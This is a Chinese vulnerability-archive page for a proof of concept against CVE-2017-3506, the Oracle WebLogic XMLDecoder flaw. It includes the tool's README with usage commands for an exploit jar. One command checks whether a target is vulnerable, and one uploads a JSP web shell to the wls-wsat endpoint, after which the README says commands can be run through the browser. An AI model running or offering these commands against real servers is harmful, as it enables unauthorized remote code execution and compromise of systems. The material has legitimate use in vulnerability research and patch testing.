支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%

POC详情: f7d53352ac89e2b07d9259b5ada70951e221eccb

来源
关联漏洞
标题:Oracle Fusion Middleware Oracle WebLogic Server 安全漏洞 (CVE-2017-3506)
Description:Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Oracle Fusion Middleware中的Oracle WebLogic Server组件的Web Services子组件存在安全漏洞。攻击者可利用该漏洞未授权访问、创建、删除或更改数据,影响数据的保密性和完整性。以下版本
Description
CVE-2017-3506
介绍
#### What is this?

This is a poc of CVE-2017-3506(Weblogic XMLDecoder Serialization)

#### How to use it?

###### check vul

```
java -jar WebLogic-XMLDecoder.jar -u http://192.168.174.144:7001
```

![check](./img/check.png)

##### GetShell

~~~
java -jar WebLogic-XMLDecoder.jar -s http://192.168.174.144:7001 /wls-wsat/CoordinatorPortType11 shell.jsp
~~~

![GetShell](./img/GetShell.png)

Then you can execute the command through the browser:

![execut_command](./img/execut_command.png)
文件快照

[4.0K] /data/pocs/f7d53352ac89e2b07d9259b5ada70951e221eccb ├── [4.0K] img │   ├── [ 55K] check.png │   ├── [ 15K] execut_command.png │   └── [ 26K] GetShell.png ├── [ 516] README.md └── [ 11K] WebLogic-XMLDecoder.jar 1 directory, 5 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。